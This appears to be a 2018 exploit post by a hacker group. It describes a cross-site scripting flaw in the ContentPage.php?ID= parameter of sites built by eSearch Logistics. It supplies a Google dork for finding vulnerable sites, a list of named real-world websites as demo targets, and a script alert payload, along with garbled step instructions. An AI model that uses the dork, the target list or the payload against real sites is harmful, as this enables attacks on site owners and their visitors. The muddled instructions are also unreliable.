كود PHP:
,--^----------,--------,-----,-------^--,
[*] | ||||||||| `--------' | O .. by Rednofozi anonysec hackers iran ..
[*] `+---------------------------^----------|
[*] `\_,-------, _________________________|
[*] / XXXXXX /`| /
[*] / XXXXXX / `\ /
[*] / XXXXXX /\______(
[*] / XXXXXX /
[*] / XXXXXX /
[*] (________(
[*] `------'
[*]====================================================================================
[*]# Exploit Title: Design by eSearch Logistics Xss Vulnerability
[*]# Exploit Author: Rednofozi
[*]# Date:29-09-2018
[*]# Email: [email protected]
[*]# Vendor Homepage: http://www.esearchlogistics.com
[*]# OUR SITE : https://anonysec.org/
[*]|====================================================================================
[*]# {INFO}
[*]# ContentPage.php?ID= ----- Xss Vulnerability
[*]
[*] 1-Google opened
[*] 2-Reveal the item on Google
[*] 3-Then copy the sprite to the alert
[*] **********alert("rednofozi")</script>
[*]|====================================================================================
[*]# {DORK}
[*]# "inurl:"contentPage.php?id=" site:com'
[*]|====================================================================================
[*]|====================================================================================
[*]# {DEMO}
[*]# 01: http://www.cat-egypt.com/ContentPage.php?ID=1_1
[*]# 02: http://www.mrgreenwood.com/evolve/templates/contentpage.php?id=70
[*]# 03: http://www.dependodrain.com/contentPage.php?id=5
[*]# 04: http://www.dependodrain.com/contentPage.php?id=5
[*]# 05 http://www.vinomaniawines.com/contentpage.php?id=34
[*]# 06:
[*]# 07:
[*]# 08: **********alert("rednofozi")</script>
[*]# 09:
[*]# 10:
[*]|====================================================================================
[*]# {TNX For}
[*]# >>> Thanks To: ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow
[*]# >>> Discovered By :Rednofozi
[*]# >>> tlg me:rednofozi
[*]|====================================================================================
[*]The END ; Good Luck :D:D:D
http://www.exploit4arab.org/exploits/2056